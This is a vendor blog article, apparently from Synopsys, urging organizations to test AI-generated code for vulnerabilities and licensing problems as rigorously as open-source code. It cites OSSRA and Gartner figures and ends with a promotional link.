Don’t be afraid of GenAI code, but don’t trust it until you test it

“You are what you eat” applies figuratively to humans. But it applies literally to the large language models (LLM) that power generative artificial intelligence (GenAI) tools. They really are what they eat.

If the massive datasets fed to LLMs from websites, forums, repositories, and open-source projects are poisoned with bias, errors, propaganda, and other junk, that’s what they will regurgitate. If the datasets are thorough, accurate, and not politicized, you’re much more likely to get useful, reliable results. Not guaranteed, but more likely.

Those who are increasingly using GenAI tools to write software code need to keep that in mind. Yes, those tools bring a host of seductive benefits to software development. They’re blazing fast; they don’t need sleep, coffee breaks, or vacations; they don’t demand a salary and benefits; and they don’t try to unionize.

Hence, the rush to employ them. GenAI-created code, in common use for less than 18 months, is now the fourth major component of software. The other three, which have been around for decades, are the code you wrote (proprietary), the code you bought (commercial), and (mostly free) open-source software (OSS).

But none of those were or are perfect—they are created by imperfect humans, after all. So GenAI code, which creates code from ingesting what already exists, isn’t perfect either. Numerous software experts have described GenAI tools as having the capability of a junior developer who has been trained and is able to produce serviceable code, but who needs a lot of oversight and supervision. In other words, it must be rigorously tested for vulnerabilities and possible licensing conflicts—just like any other code.

Studies such as the annual “Open Source Security and Risk Analysis” (OSSRA) report by the Synopsys Cybersecurity Research Center document that need. Of 1,703 codebases scanned for the OSSRA report

96% contained OSS, 84% had at least one vulnerability, and 48% contained at least one high-risk vulnerability.
54% had license conflicts and 31% contained OSS with no license.
89% contained OSS that was more than four years out-of-date, and 91% contained OSS that had not been updated for two years or more.

Obviously, code created from those, and other existing codebases will bring the same problems into what GenAI tools generate. That doesn’t mean organizations shouldn’t use GenAI, any more than that they shouldn’t use OSS. It just means they need to put the code through the same testing regime as the others.

That’s the message from analyst firm Gartner in its December 2023 “Predicts 2024: AI & Cybersecurity—Turning Disruption into an Opportunity.” It forecasts the growing adoption of GenAI but offers some warnings. Among them, it vigorously debunks the idea that GenAI will eliminate the need for testing, noting that “through 2025, generative AI will cause a spike of cybersecurity resources required to secure it, causing more than a 15% incremental spend on application and data security.”

That makes sense since one thing that’s not debatable is that GenAI tools are fast. They can produce much more code than humans. But unless the entire dataset fed to the LLM used to create your GenAI tool is perfect (it isn’t), you need to test it for security, quality, and reliability, along with compliance with any OSS licensing requirements.

Not only that, GenAI tools can also get “poisoned” through criminal hackers injecting malicious code samples into the training data fed to an LLM. That can lead the tool to generate code infected with malware.

So testing is crucial. And the three essential software testing methods—static analysis, dynamic analysis, and software composition analysis (SCA)—should be mandatory to ensure the security and quality of software, whatever its source.

In significant ways, the testing needed for GenAI code parallels that of OSS. With open source code, it’s critical to know its provenance—who made it, who maintains it (or not), what other software components it needs to function (dependencies), any known vulnerabilities in it, and what licensing provisions govern its use. An SCA tool helps find that information.

It’s also why a Software Bill of Materials (SBOM)—an inventory of the entire supply chain for a software product—has become essential to using OSS safely. An SBOM is just as essential to use GenAI tools safely.

It’s a version of President Reagan’s “trust but verify” mantra. Except in this case, don’t trust until you verify. That’s an important warning to programmers, who can get a false sense of security from GenAI. There is already research that shows developers are more likely to accept unsecured, low-quality code if it’s from a GenAI tool than they would if their neighbor gave it to them or they found it on Stack Overflow.

As Jason Schmitt, general manager of the Synopsys Software Integrity Group, put it, the origin of code created with GenAI “introduces new risks and uncertainty to the software supply chain.” Since it came from LLMs trained by large datasets, “Is that opening me up to risk that I can’t really understand? The source of that [code] now matters,” he said.

So don’t be afraid of GenAI, but don’t be blind to its limits or its risks. Use it for routine and repetitive coding tasks but leave the bespoke and intricate segments of an application to humans. And test it with the same rigor that any other software code needs.

Remember, it comes from other software. For more information on how Synopsys can help you build trust in your software, visit www.synopsys.com/software.

Artificial Intelligence